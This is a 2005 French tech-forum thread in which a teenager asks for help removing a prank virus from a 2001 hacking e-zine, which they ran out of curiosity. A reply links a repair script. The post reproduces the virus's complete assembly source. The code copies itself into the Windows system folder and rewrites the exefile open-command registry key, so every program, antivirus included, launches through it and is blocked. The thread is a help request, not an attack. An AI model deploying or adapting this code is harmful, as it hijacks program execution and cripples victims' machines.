Un virus écrit en 2001 ... qui n'est pas détecté
Un virus écrit en 2001 ... qui n'est pas détecté - Sécurité - Windows & Software
Marsh Posté le 13-08-2005 à 19:04:02
salut essai ceci
· http://perso.wanadoo.fr/doc.jm/bin/VirusBdRRepair.vbs ![[:aia]](https://forum-images.hardware.fr/images/perso/aia.gif "[:aia]")
Marsh Posté le 13-08-2005 à 22:31:53
content pour toi
a++
Message édité par balltrap34 le 13-08-2005 à 22:32:21
---------------
la chasse et le balltrap une vrai passion http://www.florensac-chasse-trap.com/
Sujets relatifs:
- Help pour parefeu paralysé par virus
- Pb de mise à jour signatures de virus eTrust IconulateIT
- URGENT: Problème PC: Virus? Worms?
- virus java bytever.r aucune solution ne fonctionne, help
- PC Plante sous internet aléatoirement Virus ??
- PC Plante sous internet aléatoirement Virus ??
- USB2 non detecté
- 2 virus et un spyware heeeeeelp!
- Trojan ou virus alakon. [Résolu.]
- virus? sablier bloqué et icône inactif
Marsh Posté le 13-08-2005 à 19:00:10
Bonjour, j'ai depuis quelques jour ... environ 3, un petit virus dit ; nul par l'auteur mais qui n'a pas été détecté par nortOn (merci ...)
j'ai trouvé ce virus dans un e-zine datant d'environ 2001.
J'ai le code source si vous voulez voir comment il est écrit pour m'aider a le corriger (svp)
Description : A chaque lancement d'un .exe le virus le bloque ... donc au redémarage plus de norton, plus de jeu plus rien quoi!
Voila le mail que j'ai envoyé a norton :
Bonjour, je suis désolé de vous contacter ici, mais je n'ai pas trouver d'autre solution.
J'ai 14 ans et un énorme problême. Je suis partie une semaine en vacance sans internet, pour m'occuper pendant cette semaine j'avais prévu un peut de lecture, j'ai donc téléchargé quelques e-zine de hacking sur madchat.org pour rire un peu.
Un ezine pas comme les autres, contenait un virus créer par le même auteur que l'ezine.
l'auteur disait que son virus était nul et qu'il était programmé faiblement.
J'ai voulu tester encore une fois norton antivirus comme j'ai l'habitude et j'ai ouvert la bombe ...
Le virus doit dater de 2001 environ, et il bloque l'execution des fichier .exe
Voici le code source : (.asm)
.486
.model flat, stdcall
option casemap :none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\advapi32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\ADVAPI32.LIB
szText MACRO Name, Text:VARARG
LOCAL lbl
jmp lbl
Name db Text,0
lbl:
ENDM
.data
buffer db 200 dup(0)
DwBytes dd 12345678H
pKey dd 0
Disp dd 0
.data?
hInstance dd ?
hIcon dd ?
fil dd 256 dup(?)
.code
start:
invoke GetModuleHandle, NULL
mov hInstance, eax
invoke LoadIcon,hInstance,500
mov hIcon, eax
szText titre, "- Seven SYnKoP Crew - Pouri v0.1b"
szText message, ".:=-( Fichier infecté (mytho!) par le Pouri virus wouwou berk chui méchant ! )-=:."
szText nefil, "C:\WINDOWS\SYSTEM\VIRUSLOL.EXE"
szText neval, 34,"C:\WINDOWS\SYSTEM\VIRUSLOL.EXE",34," %1",0
szText topr, 34,"%s",34," : ce fichier est infecté par ... rien en fait ... c'est pouri voilà tout !",0
szText dakey, "exefile\shell\open\command\"
szText szREGDWORD, 'REG_DWORD',0
invoke GetModuleFileName,NULL,addr fil,sizeof fil
invoke CopyFile,addr fil,addr nefil,FALSE
invoke RegCreateKeyExA, HKEY_CLASSES_ROOT, addr dakey, 0, addr szREGDWORD , 0,KEY_WRITE or KEY_READ, 0, addr pKey, addr Disp
invoke RegSetValueExA, pKey, NULL, NULL, REG_SZ, addr neval, sizeof neval
invoke RegCloseKey, pKey
invoke MessageBox,0, addr message, addr titre,0
call GetCommandLineA
mov edi,eax
add edi,21h
invoke wsprintf, addr buffer, addr topr, edi
invoke MessageBox,0, addr buffer, addr titre,0
invoke ExitProcess,eax
end start
Merci de m'aider.
je vous demande la même chose, une technique ou un correctif :-)
merci a vous